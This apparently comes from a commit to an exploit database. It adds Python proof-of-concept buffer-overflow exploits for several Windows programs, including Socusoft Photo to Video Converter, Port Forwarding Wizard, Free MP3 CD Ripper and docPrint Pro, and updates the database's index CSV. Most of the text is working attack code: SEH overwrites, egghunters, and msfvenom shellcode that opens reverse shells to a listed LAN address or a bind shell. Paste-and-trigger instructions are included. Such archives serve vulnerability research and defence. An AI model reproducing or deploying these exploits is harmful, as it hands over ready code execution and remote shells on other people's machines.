# 1. Run the python script
# 2. Open exploit.txt and copy the content to clipboard
# 3. Open Socusoft Photo to Video Converter Professional 8.07 and go to Video Output
# 4. Paste the clipboard into the 'Output Folder' field and click on Open
#!/usr/bin/python
# Badchars: 22, 2a, 3a, 3c, 3e, 3f, 7c + Non-ascii
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x22\x2a\x3a\x3c\x3e\x3f\x7c" -f py -e x86/alpha_mixed BufferRegister=EDI
buf = ""
buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x4b\x4c\x49\x78\x6d\x52\x55\x50\x65\x50\x37\x70\x53"
buf += "\x50\x6b\x39\x48\x65\x54\x71\x4b\x70\x45\x34\x6c\x4b"
buf += "\x52\x70\x44\x70\x6e\x6b\x52\x72\x54\x4c\x6c\x4b\x42"
buf += "\x72\x66\x74\x4e\x6b\x72\x52\x65\x78\x46\x6f\x6c\x77"
buf += "\x52\x6a\x74\x66\x45\x61\x6b\x4f\x6e\x4c\x45\x6c\x45"
buf += "\x31\x33\x4c\x55\x52\x34\x6c\x51\x30\x4f\x31\x4a\x6f"
buf += "\x54\x4d\x46\x61\x39\x57\x5a\x42\x48\x72\x32\x72\x52"
buf += "\x77\x6c\x4b\x30\x52\x32\x30\x4c\x4b\x72\x6a\x45\x6c"
buf += "\x6e\x6b\x52\x6c\x42\x31\x42\x58\x79\x73\x57\x38\x76"
buf += "\x61\x4e\x31\x32\x71\x4c\x4b\x63\x69\x31\x30\x33\x31"
buf += "\x58\x53\x6e\x6b\x52\x69\x34\x58\x4b\x53\x64\x7a\x30"
buf += "\x49\x4e\x6b\x36\x54\x4e\x6b\x63\x31\x69\x46\x55\x61"
buf += "\x79\x6f\x4e\x4c\x4b\x71\x7a\x6f\x54\x4d\x46\x61\x78"
buf += "\x47\x55\x68\x39\x70\x31\x65\x39\x66\x74\x43\x53\x4d"
buf += "\x59\x68\x47\x4b\x51\x6d\x66\x44\x61\x65\x78\x64\x56"
buf += "\x38\x6e\x6b\x61\x48\x37\x54\x76\x61\x6b\x63\x31\x76"
buf += "\x4c\x4b\x66\x6c\x72\x6b\x4e\x6b\x71\x48\x35\x4c\x33"
buf += "\x31\x68\x53\x6e\x6b\x75\x54\x4c\x4b\x56\x61\x6a\x70"
buf += "\x6c\x49\x32\x64\x74\x64\x44\x64\x73\x6b\x31\x4b\x70"
buf += "\x61\x53\x69\x30\x5a\x63\x61\x6b\x4f\x49\x70\x33\x6f"
buf += "\x31\x4f\x31\x4a\x4c\x4b\x37\x62\x48\x6b\x4e\x6d\x63"
buf += "\x6d\x31\x78\x45\x63\x44\x72\x57\x70\x57\x70\x42\x48"
buf += "\x30\x77\x44\x33\x45\x62\x33\x6f\x33\x64\x30\x68\x50"
buf += "\x4c\x34\x37\x44\x66\x53\x37\x79\x6f\x68\x55\x4e\x58"
buf += "\x6a\x30\x63\x31\x53\x30\x33\x30\x75\x79\x68\x44\x42"
buf += "\x74\x46\x30\x71\x78\x71\x39\x6d\x50\x42\x4b\x77\x70"
buf += "\x79\x6f\x59\x45\x62\x70\x56\x30\x76\x30\x32\x70\x37"
buf += "\x30\x56\x30\x31\x50\x66\x30\x53\x58\x78\x6a\x76\x6f"
buf += "\x49\x4f\x6b\x50\x6b\x4f\x6e\x35\x6c\x57\x33\x5a\x34"
buf += "\x45\x61\x78\x59\x50\x4f\x58\x39\x34\x6e\x61\x70\x68"
buf += "\x75\x52\x67\x70\x63\x31\x6f\x4b\x6d\x59\x6a\x46\x61"
buf += "\x7a\x56\x70\x62\x76\x73\x67\x53\x58\x6d\x49\x69\x35"
buf += "\x64\x34\x43\x51\x69\x6f\x6e\x35\x6b\x35\x4b\x70\x72"
buf += "\x54\x76\x6c\x39\x6f\x62\x6e\x65\x58\x64\x35\x6a\x4c"
buf += "\x55\x38\x5a\x50\x4e\x55\x4c\x62\x30\x56\x4b\x4f\x4a"
buf += "\x75\x63\x58\x70\x63\x50\x6d\x70\x64\x47\x70\x6b\x39"
buf += "\x6b\x53\x43\x67\x51\x47\x62\x77\x45\x61\x6a\x56\x43"
buf += "\x5a\x46\x72\x32\x79\x43\x66\x39\x72\x79\x6d\x61\x76"
buf += "\x4b\x77\x61\x54\x76\x44\x55\x6c\x66\x61\x63\x31\x6e"
buf += "\x6d\x43\x74\x76\x44\x74\x50\x4b\x76\x45\x50\x32\x64"
buf += "\x71\x44\x52\x70\x66\x36\x73\x66\x30\x56\x52\x66\x31"
buf += "\x46\x42\x6e\x62\x76\x51\x46\x43\x63\x73\x66\x71\x78"
buf += "\x50\x79\x38\x4c\x67\x4f\x4e\x66\x6b\x4f\x69\x45\x6c"
buf += "\x49\x6b\x50\x42\x6e\x63\x66\x42\x66\x59\x6f\x64\x70"
buf += "\x70\x68\x36\x68\x6d\x57\x75\x4d\x51\x70\x79\x6f\x58"
buf += "\x55\x6d\x6b\x5a\x50\x48\x35\x4e\x42\x76\x36\x52\x48"
buf += "\x4d\x76\x4f\x65\x4d\x6d\x6f\x6d\x79\x6f\x4a\x75\x57"
buf += "\x4c\x77\x76\x71\x6c\x57\x7a\x4d\x50\x69\x6b\x69\x70"
buf += "\x31\x65\x65\x55\x4f\x4b\x72\x67\x67\x63\x31\x62\x72"
buf += "\x4f\x53\x5a\x75\x50\x72\x73\x6b\x4f\x5a\x75\x41\x41"
egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x2C\x09\x50\x5c"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
exploit = "A"*304
exploit += "\x74\x06\x75\x04"
# 0x10047a1e
exploit += "\x1e\x7a\x04\x10"
exploit += egg
exploit += "B"*(2000-312-len(egg))
exploit += "T00WT00W"
exploit += buf
f = open("exploit.txt", "w")
f.write(exploit)
f.close()

75
exploits/windows/local/48695.py Executable file
View file

@ -0,0 +1,75 @@
# Exploit Title: Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH)
# Exploit Author: Sarang Tumne
# Date: 2020-07-18
# CVE ID: N/A
# Confirmed on release 4.8.0 and 4.5.0
# Vendor: http://www.port-forwarding.net/
# Tested on OS- Windows Vista
# Buffer overflow in upRedSun Port Forwarding Wizard 4.8.0 and earlier version allows local
# attackers to execute arbitrary code via a long request in the Register feature.
###############################################
#!/usr/bin/python
file=open("payload.txt","w+b")
buffer="\x90"*164
buffer+="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x73\x61\x72\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # EggHunter
buffer+="\x90"*20
shellcode="sarasara" #Egg tag- sarasara
shellcode+="\x90"*40
shellcode+=("\xdd\xc7\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b"
"\x4c\x6d\x38\x6c\x42\x53\x30\x57\x70\x33\x30\x51\x70\x6e\x69"
"\x78\x65\x36\x51\x6f\x30\x35\x34\x4e\x6b\x52\x70\x54\x70\x4e"
"\x6b\x46\x32\x76\x6c\x6c\x4b\x70\x52\x62\x34\x6e\x6b\x33\x42"
"\x54\x68\x66\x6f\x4e\x57\x71\x5a\x34\x66\x70\x31\x49\x6f\x4e"
"\x4c\x57\x4c\x65\x31\x61\x6c\x37\x72\x54\x6c\x55\x70\x59\x51"
"\x48\x4f\x44\x4d\x43\x31\x4a\x67\x49\x72\x5a\x52\x33\x62\x70"
"\x57\x4c\x4b\x50\x52\x56\x70\x6c\x4b\x73\x7a\x35\x6c\x4c\x4b"
"\x50\x4c\x42\x31\x70\x78\x49\x73\x53\x78\x46\x61\x4a\x71\x52"
"\x71\x4e\x6b\x30\x59\x71\x30\x55\x51\x4a\x73\x4e\x6b\x71\x59"
"\x36\x78\x78\x63\x35\x6a\x37\x39\x6c\x4b\x77\x44\x6e\x6b\x76"
"\x61\x39\x46\x76\x51\x59\x6f\x6e\x4c\x4a\x61\x78\x4f\x54\x4d"
"\x77\x71\x5a\x67\x36\x58\x79\x70\x54\x35\x69\x66\x74\x43\x51"
"\x6d\x58\x78\x55\x6b\x43\x4d\x46\x44\x70\x75\x5a\x44\x50\x58"
"\x4e\x6b\x62\x78\x65\x74\x73\x31\x6b\x63\x42\x46\x6c\x4b\x36"
"\x6c\x50\x4b\x4e\x6b\x42\x78\x65\x4c\x33\x31\x69\x43\x4c\x4b"
"\x47\x74\x4e\x6b\x77\x71\x78\x50\x4c\x49\x50\x44\x76\x44\x66"
"\x44\x43\x6b\x61\x4b\x31\x71\x51\x49\x63\x6a\x43\x61\x39\x6f"
"\x49\x70\x61\x4f\x73\x6f\x53\x6a\x4e\x6b\x37\x62\x68\x6b\x6c"
"\x4d\x63\x6d\x45\x38\x56\x53\x30\x32\x47\x70\x47\x70\x55\x38"
"\x62\x57\x74\x33\x67\x42\x31\x4f\x61\x44\x33\x58\x50\x4c\x31"
"\x67\x35\x76\x64\x47\x39\x6f\x6b\x65\x6f\x48\x6a\x30\x37\x71"
"\x73\x30\x67\x70\x57\x59\x48\x44\x30\x54\x66\x30\x75\x38\x67"
"\x59\x6d\x50\x32\x4b\x35\x50\x4b\x4f\x6a\x75\x76\x30\x30\x50"
"\x50\x50\x36\x30\x37\x30\x36\x30\x43\x70\x52\x70\x31\x78\x78"
"\x6a\x56\x6f\x49\x4f\x69\x70\x4b\x4f\x39\x45\x5a\x37\x31\x7a"
"\x44\x45\x61\x78\x49\x50\x39\x38\x56\x58\x30\x6c\x73\x58\x55"
"\x52\x73\x30\x56\x71\x43\x6c\x4c\x49\x4b\x56\x30\x6a\x56\x70"
"\x43\x66\x70\x57\x31\x78\x5a\x39\x49\x35\x62\x54\x50\x61\x39"
"\x6f\x7a\x75\x4f\x75\x6f\x30\x73\x44\x46\x6c\x4b\x4f\x70\x4e"
"\x76\x68\x61\x65\x5a\x4c\x53\x58\x68\x70\x4f\x45\x79\x32\x46"
"\x36\x59\x6f\x4a\x75\x63\x58\x32\x43\x52\x4d\x61\x74\x57\x70"
"\x6b\x39\x4a\x43\x63\x67\x76\x37\x63\x67\x64\x71\x69\x66\x62"
"\x4a\x46\x72\x73\x69\x61\x46\x6a\x42\x6b\x4d\x63\x56\x4a\x67"
"\x71\x54\x71\x34\x67\x4c\x47\x71\x46\x61\x6c\x4d\x53\x74\x37"
"\x54\x46\x70\x38\x46\x63\x30\x37\x34\x70\x54\x50\x50\x36\x36"
"\x61\x46\x52\x76\x53\x76\x53\x66\x50\x4e\x46\x36\x33\x66\x36"
"\x33\x42\x76\x52\x48\x70\x79\x68\x4c\x37\x4f\x4f\x76\x59\x6f"
"\x38\x55\x4f\x79\x6b\x50\x70\x4e\x32\x76\x77\x36\x49\x6f\x46"
"\x50\x55\x38\x44\x48\x6d\x57\x47\x6d\x61\x70\x59\x6f\x6e\x35"
"\x4d\x6b\x4b\x4e\x74\x4e\x64\x72\x39\x7a\x72\x48\x4e\x46\x6c"
"\x55\x6f\x4d\x6d\x4d\x59\x6f\x48\x55\x65\x6c\x66\x66\x71\x6c"
"\x37\x7a\x6f\x70\x79\x6b\x6d\x30\x54\x35\x66\x65\x6f\x4b\x47"
"\x37\x46\x73\x53\x42\x72\x4f\x72\x4a\x55\x50\x66\x33\x49\x6f"
"\x39\x45\x41\x41")
buffer+="\xeb\xb6\x90\x90" #Backward short jump- nseh
buffer+="\x6d\x57\x37\x7c" #PPR- SEH
buffer+="A"*200
file.write(buffer+shellcode)
file.close()

62
exploits/windows/local/48696.py Executable file
View file

@ -0,0 +1,62 @@
# Exploit Title: Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)
# Date: 2020-07-22
# Exploit Author: Eduard Palisek
# Vendor Homepage: https://www.cleanersoft.com
# Software Link: https://www.cleanersoft.com/download/FMCRSetup.exe
# Version: 2.8 Build 20140611
# Tested on: [Windows XP, Professional, Version 2002, SP 3
#!/usr/bin/python
file = open("exploit.wav", "wb")
# msfvenom -p windows/shell_bind_tcp LPORT=9001 -a x86 EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\" -f python -v shellcode_bind
shellcode_bind = b""
shellcode_bind += b"\xb8\x88\xbf\xa2\x65\xdb\xd6\xd9\x74\x24"
shellcode_bind += b"\xf4\x5a\x2b\xc9\xb1\x53\x83\xc2\x04\x31"
shellcode_bind += b"\x42\x0e\x03\xca\xb1\x40\x90\x36\x25\x06"
shellcode_bind += b"\x5b\xc6\xb6\x67\xd5\x23\x87\xa7\x81\x20"
shellcode_bind += b"\xb8\x17\xc1\x64\x35\xd3\x87\x9c\xce\x91"
shellcode_bind += b"\x0f\x93\x67\x1f\x76\x9a\x78\x0c\x4a\xbd"
shellcode_bind += b"\xfa\x4f\x9f\x1d\xc2\x9f\xd2\x5c\x03\xfd"
shellcode_bind += b"\x1f\x0c\xdc\x89\xb2\xa0\x69\xc7\x0e\x4b"
shellcode_bind += b"\x21\xc9\x16\xa8\xf2\xe8\x37\x7f\x88\xb2"
shellcode_bind += b"\x97\x7e\x5d\xcf\x91\x98\x82\xea\x68\x13"
shellcode_bind += b"\x70\x80\x6a\xf5\x48\x69\xc0\x38\x65\x98"
shellcode_bind += b"\x18\x7d\x42\x43\x6f\x77\xb0\xfe\x68\x4c"
shellcode_bind += b"\xca\x24\xfc\x56\x6c\xae\xa6\xb2\x8c\x63"
shellcode_bind += b"\x30\x31\x82\xc8\x36\x1d\x87\xcf\x9b\x16"
shellcode_bind += b"\xb3\x44\x1a\xf8\x35\x1e\x39\xdc\x1e\xc4"
shellcode_bind += b"\x20\x45\xfb\xab\x5d\x95\xa4\x14\xf8\xde"
shellcode_bind += b"\x49\x40\x71\xbd\x05\xa5\xb8\x3d\xd6\xa1"
shellcode_bind += b"\xcb\x4e\xe4\x6e\x60\xd8\x44\xe6\xae\x1f"
shellcode_bind += b"\xaa\xdd\x17\x8f\x55\xde\x67\x86\x91\x8a"
shellcode_bind += b"\x37\xb0\x30\xb3\xd3\x40\xbc\x66\x49\x48"
shellcode_bind += b"\x1b\xd9\x6c\xb5\xdb\x89\x30\x15\xb4\xc3"
shellcode_bind += b"\xbe\x4a\xa4\xeb\x14\xe3\x4d\x16\x97\x28"
shellcode_bind += b"\xa7\x9f\x71\x44\xa7\xc9\x2a\xf0\x05\x2e"
shellcode_bind += b"\xe3\x67\x75\x04\x5b\x0f\x3e\x4e\x5c\x30"
shellcode_bind += b"\xbf\x44\xca\xa6\x34\x8b\xce\xd7\x4a\x86"
shellcode_bind += b"\x66\x80\xdd\x5c\xe7\xe3\x7c\x60\x22\x93"
shellcode_bind += b"\x1d\xf3\xa9\x63\x6b\xe8\x65\x34\x3c\xde"
shellcode_bind += b"\x7f\xd0\xd0\x79\xd6\xc6\x28\x1f\x11\x42"
shellcode_bind += b"\xf7\xdc\x9c\x4b\x7a\x58\xbb\x5b\x42\x61"
shellcode_bind += b"\x87\x0f\x1a\x34\x51\xf9\xdc\xee\x13\x53"
shellcode_bind += b"\xb7\x5d\xfa\x33\x4e\xae\x3d\x45\x4f\xfb"
shellcode_bind += b"\xcb\xa9\xfe\x52\x8a\xd6\xcf\x32\x1a\xaf"
shellcode_bind += b"\x2d\xa3\xe5\x7a\xf6\xc3\x07\xae\x03\x6c"
shellcode_bind += b"\x9e\x3b\xae\xf1\x21\x96\xed\x0f\xa2\x12"
shellcode_bind += b"\x8e\xeb\xba\x57\x8b\xb0\x7c\x84\xe1\xa9"
shellcode_bind += b"\xe8\xaa\x56\xc9\x38"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
nops = "\x90" * 30
junk1 = "A" * 2112
tag = "W00TW00T"
junk2 = "B" * (2000-len(shellcode_bind+nops+tag))
eip = "\x53\x93\x42\x7e" # 0x7e429353 : jmp esp in user32.dll
buffer = junk1 + tag + nops + shellcode_bind + junk2 + eip + nops + egghunter
file.write(buffer)
file.close()

99
exploits/windows/local/48719.py Executable file
View file

@ -0,0 +1,99 @@
# Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)
# Date: 2020-07-26
# Exploit Author: MasterVlad
# Vendor Homepage: http://www.verypdf.com
# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
# Version: 8.0
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 32-bit
# Proof of Concept:
# 1. Run the python script
# 2. Open exploit.txt and copy the content to clipboard
# 3. Open doc2pdf_win.exe and go to File -> Add URL
# 4. Paste the clipboard into the field and click on Ok
#!/usr/bin/python
# encoded egghunter
egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A"
egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
buf = ""
buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"
exploit = "A"*3876
exploit += "\x74\x06\x75\x04"
# 0x1001062d - pop pop ret - reg.dll
exploit += "\x2d\x06\x01\x10"
exploit += egg
exploit += "D"*(10000-3884-len(egg)-len(buf)-8)
exploit += "T00WT00W"
exploit += buf
f = open("exploit.txt", "w")
f.write(exploit)
f.close()

28
files_exploits.csv
View file

@ -6754,6 +6754,7 @@ id,file,description,date,author,type,platform,port
48617,exploits/windows/dos/48617.py,"Code Blocks 20.03 - Denial Of Service (PoC)",2020-06-23,"Paras Bhatia",dos,windows,
48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",2020-07-06,"Saeed reza Zamanian",dos,windows,
48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",2020-07-06,mostwanted002,dos,linux,
48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",2020-07-26,"Felipe Winsnes",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -11125,6 +11126,13 @@ id,file,description,date,author,type,platform,port
48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows,
48685,exploits/windows/local/48685.py,"FTPDummy 4.80 - Local Buffer Overflow (SEH)",2020-07-23,"Felipe Winsnes",local,windows,
48686,exploits/windows/local/48686.py,"Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)",2020-07-23,MasterVlad,local,windows,
48687,exploits/windows/local/48687.py,"Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)",2020-07-26,"Felipe Winsnes",local,windows,
48688,exploits/windows/local/48688.py,"Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
48689,exploits/windows/local/48689.py,"DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
48691,exploits/windows/local/48691.py,"Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
48695,exploits/windows/local/48695.py,"Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH)",2020-07-26,"Sarang Tumne",local,windows,
48696,exploits/windows/local/48696.py,"Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)",2020-07-26,"Eduard Palisek",local,windows,
48719,exploits/windows/local/48719.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42933,3 +42941,23 @@ id,file,description,date,author,type,platform,port
48682,exploits/php/webapps/48682.txt,"WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection",2020-07-22,"Vlad Vector",webapps,php,
48683,exploits/multiple/webapps/48683.py,"Sophos VPN Web Panel 2020 - Denial of Service (Poc)",2020-07-22,"Berk KIRAS",webapps,multiple,
48684,exploits/hardware/webapps/48684.txt,"UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass",2020-07-23,LiquidWorm,webapps,hardware,
48690,exploits/php/webapps/48690.txt,"GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)",2020-07-26,Balzabu,webapps,php,
48692,exploits/java/webapps/48692.py,"ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection",2020-07-26,aldorm,webapps,java,
